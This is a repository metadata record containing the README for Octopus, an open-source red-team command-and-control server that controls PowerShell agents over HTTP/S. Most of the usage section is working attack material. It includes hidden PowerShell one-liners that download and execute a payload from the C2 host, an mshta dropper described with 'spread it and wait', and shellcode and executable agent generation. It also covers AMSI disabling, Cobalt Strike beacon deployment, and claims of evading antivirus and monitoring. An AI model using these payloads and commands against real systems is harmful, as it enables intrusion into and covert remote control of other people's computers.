{"id":13383194,"url":"https://github.com/mhaskar/octopus","last_synced_at":"2026-01-18T05:42:56.133Z","repository":{"id":38238589,"uuid":"205457108","full_name":"mhaskar/Octopus","owner":"mhaskar","description":"Open source pre-operation C2 server based on python and powershell","archived":false,"fork":false,"pushed_at":"2021-07-06T23:52:37.000Z","size":4173,"stargazers_count":727,"open_issues_count":12,"forks_count":155,"subscribers_count":39,"default_branch":"master","last_synced_at":"2024-10-26T03:19:52.856Z","etag":null,"topics":["c2","pentesting","powershell","python","redteam","security"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mhaskar.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null},"funding":{"github":["mhaskar"]}},"created_at":"2019-08-30T21:09:07.000Z","updated_at":"2024-10-10T08:33:02.000Z","dependencies_parsed_at":"2022-07-14T03:20:35.142Z","dependency_job_id":null,"html_url":"https://github.com/mhaskar/Octopus","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mhaskar%2FOctopus","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mhaskar%2FOctopus/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mhaskar%2FOctopus/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mhaskar%2FOctopus/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mhaskar","download_url":"https://codeload.github.com/mhaskar/Octopus/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243377523,"owners_count":20281248,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["c2","pentesting","powershell","python","redteam","security"],"created_at":"2024-07-30T10:01:12.917Z","updated_at":"2026-01-18T05:42:56.118Z","avatar_url":"https://github.com/mhaskar.png","language":"Python","readme":"# What is Octopus ? ![](https://img.shields.io/badge/python-3-yellow)\n\n  Octopus is an open source, pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.\n\n  The main purpose of creating Octopus is for use before any red team operation, where rather than starting the engagement with your full operational arsenal and infrastructure, you can use Octopus first to attack the target and gather information before you start your actual red team operation.\n\n  Octopus works in a very simple way to execute commands and exchange information with the C2 over a well encrypted channel, which makes it inconspicuous and undetectable from almost every AV, endpoint protection, and network monitoring solution.\n\n  One cool feature in Octopus is called ESA, which stands for \"Endpoint Situational Awareness\", which will gather some important information about the target that will help you to gain better understanding of the target network endpoints that you will face during your operation, thus giving you a shot to customize your real operation based on this information.\n\n  Octopus is designed to be stealthy and covert while communicating with the C2, as it uses AES-256 by default for its encrypted channel between the powershell agent and the C2 server. You can also opt for using SSL/TLS by providing a valid certficate for your domain and configuring the Octopus C2 server to use it.\n\n\n\n  # Octopus key features\n  Octopus is packed with a number of features that allows you to gain an insight into your upcoming engagement before you actually need to deploy your full aresenal or tools and techniques, such as:\n\n\n  * Control agents throught HTTP/S.\n  * Execute system commands.\n  * Download / Upload files.\n  * Load external powershell modules.\n  * Use encrypted channels (AES-256) between C2 and agents.\n  * Use inconspicuous techniques to execute commands and transfer results.\n  * Create custom and multiple listeners for each target.\n  * Generate different types of payloads.\n  * Support all windows versions with powershell 2.0 and higher.\n  * Run Octopus windows executable agent without touching powershell.exe process.\n  * **Gather information automatically from the endpoint (endpoint situational awareness) feature.**\n\n# Requirements\n\nYou can install all of Octopus' requirements via :\n\n```pip install -r requirements.txt```\n\nYou need to install `nasm` for linux and 'mingw-w64' compiler to use the shellcoding feature and the spoofed args agent.\n\nYou can install nasm on Debian based distros using:\n\n`apt install nasm`\n\nAnd you can install `mingw-w64` on Debian based distros using:\n\n`apt install mingw-w64`\n\nOctopus has been tested on the following operating systems:\n\n* Ubuntu (18.04)\n* Ubuntu (16.04)\n* Kali Linux (2019.2)\n\nYou will also need to install mono to make sure that you can compile the C# source without issues.\n\nOctopus depends on mono-csc binary to compile the C# source and you can install it by the following command `apt install mono-devel` which has been tested on kali and ubuntu 16.04.\n\n\u003e you can use Octopus without installing mono but you will not be able to use `generate_exe` command.\n\nAlso please note that compling C# depends on the `System.Management.Automation.dll` assembly with SHA1 hash a43ed886b68c6ee913da85df9ad2064f1d81c470.\n\nIf you encounter any issues using Octopus, feel free to file a [bug report](https://github.com/mhaskar/Octopus/issues)!\n\n# Installation\nFirst of all make sure to download the latest version of Octopus using the following command :\n\n```git clone https://github.com/mhaskar/Octopus/```\n\nThen you need to install the requirements using the following command :\n\n`pip install -r requirements.txt`\n\nAfter that you can start the octopus server by running the following :\n\n`./octopus.py`\n\nYou will by greeted with the following once you run it :\n\n```\n┌─[askar@hackbook]─[/opt/redteaming/Octopus]\n└──╼ $python3 octopus.py\n\n\n\n      ___           ___                       ___           ___         ___           ___\n     /  /\\         /  /\\          ___        /  /\\         /  /\\       /__/\\         /  /\\\n    /  /::\\       /  /:/         /  /\\      /  /::\\       /  /::\\      \\  \\:\\       /  /:/_\n   /  /:/\\:\\     /  /:/         /  /:/     /  /:/\\:\\     /  /:/\\:\\      \\  \\:\\     /  /:/ /\\\n  /  /:/  \\:\\   /  /:/  ___    /  /:/     /  /:/  \\:\\   /  /:/~/:/  ___  \\  \\:\\   /  /:/ /::\\\n /__/:/ \\__\\:\\ /__/:/  /  /\\  /  /::\\    /__/:/ \\__\\:\\ /__/:/ /:/  /__/\\  \\__\\:\\ /__/:/ /:/\\:\\\n \\  \\:\\ /  /:/ \\  \\:\\ /  /:/ /__/:/\\:\\   \\  \\:\\ /  /:/ \\  \\:\\/:/   \\  \\:\\ /  /:/ \\  \\:\\/:/~/:/\n  \\  \\:\\  /:/   \\  \\:\\  /:/  \\__\\/  \\:\\   \\  \\:\\  /:/   \\  \\::/     \\  \\:\\  /:/   \\  \\::/ /:/\n   \\  \\:\\/:/     \\  \\:\\/:/        \\  \\:\\   \\  \\:\\/:/     \\  \\:\\      \\  \\:\\/:/     \\__\\/ /:/\n    \\  \\::/       \\  \\::/          \\__\\/    \\  \\::/       \\  \\:\\      \\  \\::/        /__/:/\n     \\__\\/         \\__\\/                     \\__\\/         \\__\\/       \\__\\/         \\__\\/\n\n\n                    v1.2 stable !\n\n\n Octopus C2 | Control your shells\n\n\nOctopus \u003e\u003e\n\n```\n# Usage\n\nUsing Octopus is quite simple to use, as you just need to start a listener and generate your agent based on that listener's information.\n\nYou can generate as many listeners as you need, and then you can start interacting with your agents that connect to them.\n\n\n### Profile setup\n\nBefore you can start using Octopus you have to setup a URL handling profile which will control the C2 behavior and functions, as Octopus is an HTTP based C2 thus it depends on URLs to handle the connections and to guarantee that the URLs will not serve as a signatures or IoC in the network you are currently attacking, the URLs can be easily customized and renamed as needed.\n\n\u003e Profile setup currently only support URL handling, auto kill value and headers.\n\n**Setting up your profile**\n\nTo start setting up your profile you need to edit the `profile.py` file , which contains a number of key variables, which are:\n\n  - file_reciever_url: handles file downloading.\n  - report_url: handle ESA reports.\n  - command_send_url: handles the commands that will be sent to the target.\n  - command_receiver_url: handles commands will be executed on the target.\n  - first_ping_url: handles the first connection from the target.\n  - server_response_header: this header will show in every response.\n  - auto_kill: variable to control when the agent will be killed after N failed connections with the C2\n\n\nExample:\n\n```\n#!/usr/bin/python3\n\n# this is the web listener profile for Octopus C2\n# you can customize your profile to handle a specific URLs to communicate with the agent\n# TODO : add the ability to customize the request headers\n\n# handling the file downloading\n# Ex : /anything\n# Ex : /anything.php\nfile_receiver_url = \"/messages\"\n\n\n# handling the report generation\n# Ex : /anything\n# Ex : /anything.php\nreport_url = \"/calls\"\n\n# command sending to agent (store the command will be executed on a host)\n# leave \u003chostname\u003e as it with the same format\n# Ex : /profile/\u003chostname\u003e\n# Ex : /messages/\u003chostname\u003e\n# Ex : /bills/\u003chostname\u003e\ncommand_send_url = \"/view/\u003chostname\u003e\"\n\n\n# handling the executed command\n# Ex : /anything\n# Ex : /anything.php\ncommand_receiver_url = \"/bills\"\n\n\n# handling the first connection from the agent\n# Ex : /anything\n# Ex : /anything.php\nfirst_ping_url = \"/login\"\n\n# will return in every response as Server header\nserver_response_header = \"nginx\"\n\n# will return white page that includes HTA script\nmshta_url = \"/hta\"\n\n# auto kill value after n tries\n\nauto_kill = 10\n\n\n```\n\nThe agent and the listeners will be configured to use this profile to communicate with each other. Next we need to know how to create a listener.\n\n### Listeners\n\nOctopus has two main listeners,\"http listener\" and \"https listener\" , and the options of the two listeners are mostly identical.\n\n**HTTP listener :**\n\n`listen_http` command takes the following arguments to start:\n\n- BindIP  \t\t    Defines the IP address that will be used by the listener.\n- BindPort      \tDefines the port you want to listen on.\n- Hostname \t\t    Will be used to request the payload from.\n- Interval \t    \tHow number of seconds the agent will wait before checking for commands.\n- URL  \t\t\t    The name of the page hosting the payload.\n- Listener_name  \tListener name to use.\n\n you can also view an example of it by running the `listen_http` command:\n\n```\nOctopus \u003e\u003elisten_http\n[-] Please check listener arguments !\nSyntax  : listen_http BindIP BindPort hostname interval URL listener_name\nExample (with domain) : listen_http 0.0.0.0 8080 myc2.live 5 comments.php op1_listener\nExample (without domain) : listen_http 0.0.0.0 8080 172.0.1.3 5 profile.php op1_listener\n\n##########\nOptions info :\n\nBindIP  \t\tIP address that will be used by the listener\nBindPort  \t\tport you want to listen on\nHostname \t\twill be used to request the payload from\nInterval \t\thow may seconds that agent will wait before check for commands\nURL  \t\t\tpage name will hold the payload\nListener_name  \tlistener name to use\n\nOctopus \u003e\u003e\n```\n\nAnd we can start a listener using the following command :\n\n`listen_http 0.0.0.0 8080 192.168.178.1 5 page.php operation1`\n\nThe following result will be returned:\n\n```\nOctopus \u003e\u003elisten_http 0.0.0.0 8080 192.168.178.1 5 page.php operation1\nOctopus \u003e\u003e * Serving Flask app \"core.weblistener\" (lazy loading)\n * Environment: production\n   WARNING: Do not use the development server in a production environment.\n   Use a production WSGI server instead.\n * Debug mode: off\n\nOctopus \u003e\u003e\n```\n\na listener has been started successfully, and we can view all the listeners using the `listeners` command:\n\n```\nOctopus \u003e\u003elisteners\n\n\nName        IP         Port  Host             Interval  Path      SSL\n----------  -------  ------  -------------  ----------  --------  -----\noperation1  0.0.0.0    8080  192.168.178.1           5  page.php  False\n\n\nOctopus \u003e\u003e\n```\n\n**HTTPS listener :**\n\nTo create an HTTPS listener you can use `listen_https` command as such:\n\n```\nOctopus \u003e\u003elisten_https\n[-] Please check listener arguments !\nSyntax  : listen_https BindIP BindPort hostname interval URL listener_name certficate_path key_path\nExample (with domain) : listen_https 0.0.0.0 443 myc2.live 5 login.php op1_listener certs/cert.pem certs/key.pem\nOctopus \u003e\u003elisten_https 0.0.0.0 443 myc2.live 5 login.php darkside_operation certs/cert.pem certs/key.pem\nSSL listener started !\n[+]darkside_operation Listener has been created\nOctopus \u003e\u003e * Serving Flask app \"core.weblistener\" (lazy loading)\n * Environment: production\n   WARNING: Do not use the development server in a production environment.\n   Use a production WSGI server instead.\n * Debug mode: off\n\nOctopus \u003e\u003e\n```\n\nThe `listen_https` command takes the following arguments to start:\n\n  - BindIP   : which is the IP address that will be used by the listener\n  - BindPort : which is the port you want to listen on\n  - Hostname : will be used to request the payload from\n  - Interval : how may seconds that agent will wait before check for commands\n  - URL page : name will hold the payload\n  - Listener_name : listener name to use\n  - certficate_path : path for valid ssl certficate (called fullchain.pem for letsencrypt certficates)\n  - key_path        : path for valid key for the ssl cerficate (called key.pem for letsencrypt certficates)\n\nPlease note that you need to provide a valid SSL certficate that is associated with the domain used.\n\n\n### Generate agents\n\n**Powershell oneliner**\n\nTo generate an agent for the listener `operation1` we can use the following command:\n\n`generate_powershell operation1`\n\nand we will get the following result:\n```\nOctopus \u003e\u003egenerate_powershell operation1\n#====================\n1) powershell -w hidden \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.1:8080/page.php');\"\n\n2) powershell -w hidden \"Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.168.178.1:8080/page.php');\"\n\n3) powershell -w hidden \"$w = (New-Object Net.WebClient).DownloadString('http://192.168.178.1:8080/page.php');Invoke-Expression $w;\"\n\nNote - For Windows 7 clients you may need to prefix the payload with \"Add-Type -AssemblyName System.Core;\"\n       e.g. powershell -w hidden \"Add-Type -AssemblyName System.Core;IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.1:8080/page.php');\"\n\nHack your way in ;)\n#====================\n\nOctopus \u003e\u003e\n```\n\nNow we can use this oneliner to start our agent.\n\n**HTA oneliner**\n\nTo generate a HTA oneliner for the listener1 `operation1` we can use the following command:\n\n`generate_hta operation1`\n\nand we will get the following results:\n\n```\nOctopus \u003e\u003egenerate_hta operation1\n#====================\nmshta http://192.168.178.1:8080/hta\nspread it and wait ;)\n#====================\nOctopus \u003e\u003e\n```\nPlease note that you can edit the `/hta` URL using `profile.py`\n\n**Octopus EXE agent**\n\nTo generate an EXE agent for listener `operation1` we can use the following command:\n\n`generate_unmanaged_exe operation1 /opt/Octopus/file.exe`\n\nand we will get the following result:\n\n```\nOctopus \u003e\u003egenerate_unmanaged_exe darkside_operation2 /opt/Octopus/file.exe\n[+] file compiled successfully !\n[+] binary file saved to /opt/Octopus/file.exe\nOctopus \u003e\u003e\n```\n\n\u003e Please note that you have to install mono-csc to compile the C# source.\n\n***Octopus Spoofed arguments agent***\n\nYou can generate a new EXE agent that will run a Powershell process with spoofed arguments based on [Adam Chester's brilliant research](https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/).\n\nTo generate this exe, you can use the following command:\n\n```\nOctopus \u003e\u003egenerate_spoofed_args_exe\n[-] Please select a listener and check your options !\nSyntax :  generate_spoofed_args_exe listener_name output_path\nExample : generate_spoofed_args_exe listener1 /opt/Octopus/file.exe\nOctopus \u003e\u003e\n```\n\n***Generate x64 shellcode and x86 shellcode***\n\nOctopus can generate both x64 and x86 shellcode starting from version 1.2, the generated shellcode is using CreateProcessA to start powershell.exe oneliner that will launch powershell agent.\n\nTo generate x64 shellcode, you can use the following command:\n\n```\nOctopus \u003e\u003egenerate_x64_shellcode\n[-] Please select a listener and check your options !\nSyntax :  generate_x64_shellcode listener_name\nExample : generate_x64_shellcode listener1\nOctopus \u003e\u003e\n```\n\nTo generate x86 shellcode, you can use the following command:\n\n```\nOctopus \u003e\u003egenerate_x86_shellcode\n[-] Please select a listener and check your options !\nSyntax :  generate_x86_shellcode listener_name\nExample : generate_x86_shellcode listener1\nOctopus \u003e\u003e\n```\n\n### Interacting with agents\n\nFirst of all you can list all connected agents using the `list` command to get the following results:\n```\nOctopus \u003e\u003elist\n\n\n  Session  IP            Hostname       PID  Username       Domain        Last ping                 OS\n---------  ------------  -----------  -----  -------------  ------------  ------------------------  --------------------------------\n        1  192.168.1.43  HR-PC-TYRMJ  10056  hr-pc\\labuser  darkside.com  Tue Sep  3 10:22:07 2019  Microsoft Windows 10 Pro(64-bit)\n\n\nOctopus \u003e\u003e\n```\n\nAnd then we can use the `interact` command to interact with the host as follows:\n\n```\nOctopus \u003e\u003elist\n\n\n  Session  IP            Hostname       PID  Username       Domain        Last ping                 OS\n---------  ------------  -----------  -----  -------------  ------------  ------------------------  --------------------------------\n        1  192.168.1.43  HR-PC-TYRMJ  10056  hr-pc\\labuser  darkside.com  Tue Sep  3 10:22:07 2019  Microsoft Windows 10 Pro(64-bit)\n\n\nOctopus \u003e\u003einteract 1\n(HR-PC-TYRMJ) \u003e\u003e\n```\n\nYou can list all the available commands using the `help` command like the following:\n\n```\nOctopus \u003e\u003elist\n\n\n  Session  IP            Hostname       PID  Username       Domain        Last ping                 OS\n---------  ------------  -----------  -----  -------------  ------------  ------------------------  --------------------------------\n        1  192.168.1.43  HR-PC-TYRMJ  10056  hr-pc\\labuser  darkside.com  Tue Sep  3 10:22:07 2019  Microsoft Windows 10 Pro(64-bit)\n\n\nOctopus \u003e\u003einteract 1\n(HR-PC-TYRMJ) \u003e\u003e help\n\n\nAvailable commands to use :\n\nHint : if you want to execute system command just type it and wait for the results\n\n+++++++++\nhelp  \t\t\t\tshow this help menu\nexit/back \t\t\texit current session and back to the main screen\nclear \t\t\t\tclear the screen output\ndownload \t\t\tdownload file from the target machine\ndeploy_cobalt_beacon \t\tdeploy cobalt strike powershell beacon in the current process\nload \t\t\t\tload powershell module to the target machine\ndisable_amsi \t\t\tdisable AMSI on the target machine\nreport \t\t\t\tget situation report from the target\n\n\n(HR-PC-TYRMJ) \u003e\u003e\n```\n\nTo execute a system command directly we can type the command directly and then wait for the results based on the interval check time that we set when we created the listener.\n\n```\n(HR-PC-TYRMJ) \u003e\u003e ipconfig\n[+] Command sent , waiting for results\n(HR-PC-TYRMJ) \u003e\u003e\nCommand execution result is :\n\nWindows IP Configuration\n\n\nEthernet adapter Ethernet1:\n\n   Media State . . . . . . . . . . . : Media disconnected\n   Connection-specific DNS Suffix  . :\n\nEthernet adapter Ethernet0:\n\n   Connection-specific DNS Suffix  . : home\n   Link-local IPv6 Address . . . . . : fe80::f85f:d52b:1d8d:cbae%10\n   IPv4 Address. . . . . . . . . . . : 192.168.1.43\n   Subnet Mask . . . . . . . . . . . : 255.255.255.0\n   Default Gateway . . . . . . . . . : 192.168.1.1\n\nEthernet adapter Ethernet:\n\n   Media State . . . . . . . . . . . : Media disconnected\n   Connection-specific DNS Suffix  . :\n\nEthernet adapter Bluetooth Network Connection:\n\n   Media State . . . . . . . . . . . : Media disconnected\n   Connection-specific DNS Suffix  . :\n\n\n\n(HR-PC-TYRMJ) \u003e\u003e\n```\n\nIn this case the command has been encrypted and then sent to the agent, after that the client will decrypt the command and execute it, the agent will encrypt the results, and finally send it back again to the C2 to decrypt it and show the results.\n\nWe can also use the `report` command to get the ESA information like the following:\n\n```\n(HR-PC-TYRMJ) \u003e\u003e report\n[+] Command sent , waiting for results\n(HR-PC-TYRMJ) \u003e\u003e\nEndpoint situation awareness report for HR-PC-QNGAV\n\n=============\nHostname : \tHR-PC-QNGAV\nDomain : \tdarkside.com\nOS : \t\tMicrosoft Windows 10 Pro(64-bit)\nOS build : \t10.0.17134\nOS arch : \t64-bit\nAntiVirus : \tSymantec\nSIEM solution : False\nInternal interfaces/IPs :\n\tIP : 192.168.178.144\n\tIP : 172.12.1.20\n\n\nDevice language : en-US\nDevice uptime : 41.6386169797778 hours\nDevice local time : 21:55(09/09/2019)\n\n\n(HR-PC-TYRMJ) \u003e\u003e\n```\n\nYou can load an external powershell module by placing it in the `modules` directory, then executing `load module.ps1`.\n\nAlso you can list all of the modules in the modules directory by executing the `modules` command like so:\n\n```\n(HR-PC-TYRMJ) \u003e\u003e modules\nPowerView.ps1\n(HR-PC-TYRMJ) \u003e\u003e load PowerView.ps1\n[+] Module should be loaded !\n(HR-PC-TYRMJ) \u003e\u003e\n```\n\n# More about Octopus\n\n* [Octopus v1.0 stable: Cobalt Strike deployment \u0026 much more!](https://shells.systems/octopus-v1-0-stable-cobalt-strike-deployment-much-more)\n\n* [Unveiling Octopus: The pre-operation C2 for Red Teamers](https://shells.systems/unveiling-octopus-the-pre-operation-c2-for-red-teamers/)\n\n\n\n\n\n# Credits\n\n* [Ian Lyte](https://twitter.com/Bb_hacks) for reporting multiple bugs in Octopus and pushing an enhanced AMSI bypass module.\n\n* [Khlief](https://github.com/ahmedkhlief) for adding HTA module and fix a bug in download feature\n\n* [Moath Maharmah](https://twitter.com/iomoaaz) for enhancing the encryption module and writing a standalone C# Octopus agent which will be added to the upcoming release.\n\n* [TeslaPulse](https://github.com/TeslaPulse/) for testing Octopus\n\n* [J005](https://github.com/iomoath) for adding enhanced Powershell oneliner and fix an issue in the HID attack script.\n\n\n\n# License\n\nThis project is licensed under the GPL-3.0 License - see the LICENSE file for details\n","funding_links":["https://github.com/sponsors/mhaskar"],"categories":["\u003ca id=\"ec8ac76dec379ff452f681a4504444b8\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"dbd38a8d8a1e246cd8628a34002c5fe7\"\u003e\u003c/a\u003e新添加"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmhaskar%2Foctopus","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmhaskar%2Foctopus","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmhaskar%2Foctopus/lists"}